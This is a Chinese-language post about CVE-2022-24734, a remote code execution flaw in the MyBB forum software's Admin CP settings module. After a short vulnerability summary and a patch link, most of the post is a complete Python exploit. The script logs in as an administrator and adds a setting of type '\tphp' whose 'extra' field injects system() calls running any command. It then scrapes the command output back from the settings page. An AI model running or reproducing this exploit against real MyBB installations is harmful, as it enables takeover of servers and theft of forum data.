MyBB 代码注入漏洞 CVE-2022-24734 PoC

漏洞简介

MyBB(MyBulletinBoard)是MyBB(MYBB)团队的开发的一套用PHP和MySQL开发的免费且基于Web的论坛软件。该软件具有简单易用、支持多国语言、可扩展等特点。

MyBB 存在安全漏洞,该漏洞源于Admin CP 的设置管理模块在插入和更新时无法正确验证设置类型,这会导致远程代码执行 (RCE) 漏洞。

漏洞公告

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f

项目地址

https://github.com/Altelus1/CVE-2022-24734

POC&EXP

RCE可以在MyBB管理中心的配置->添加新设置中获得。用户必须有添加或更新设置的权限。

这是在MyBB 1.8.29上测试的。

3be7a764ef53

 

import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup


def login(username, password):

    data = {
        "username" : username,
        "password" : password,
        "do" : "login"
    }

    login_txt = r_client.post(host + "/admin/index.php", data=data).text

    if "The username and password combination you entered is invalid" in login_txt:
        print("[-] Login failure. Incorrect credentials supplied")
        exit(0)

    print("[+] Login successful!")


def add_settings(cmd, raw_cmd=""):

    config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text

    if "Access Denied" in config_settings_txt:
        print("[-] Supplied user doesn't have the rights to add a setting")
        exit(0)

    print("[*] Adding a malicious settings...")

    soup = BeautifulSoup(config_settings_txt, "lxml")
    my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']

    rand_string = get_rand_string()

    if raw_cmd != "":
        extra = "\" . system('{}') .\"".format(raw_cmd)
    else:
        extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)

    data = {
        "my_post_key" : my_post_key,
        "title" : "An innocent setting",
        "description" : "An innocent description",
        "gid" : 1,
        "disporder" : "",
        "name" : rand_string,
        "type" : "\tphp",
        "extra" : extra,
        "value" : "An innocent value" 
    }

    post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)

    if post_setting.status_code != 302:
        soup = BeautifulSoup(post_setting.text, "lxml")
        error_txt = soup.find_all("div", {"class" : "error"})[0].text
        print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
        exit(0)

    print("[+] Malicious post settings accepted!")
    return rand_string

def get_rand_string(length=20):
    
    return ''.join(random.choice(string.ascii_letters) for i in range(length))

def get_cmd_result(ident_string, raw_cmd=""):

    conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text

    soup = BeautifulSoup(conf_settings_list, "lxml")
    row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]

    cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text

    if raw_cmd == "":
        cmd_result = b64decode(cmd_result[2:]).decode()

    print("[+] Result: {}".format(str(cmd_result)))

parser = argparse.ArgumentParser()

parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()

username = args.username
password = args.password
host = args.host

cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd

r_client = requests.Session()

login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)

 

 

 

请登录后发表评论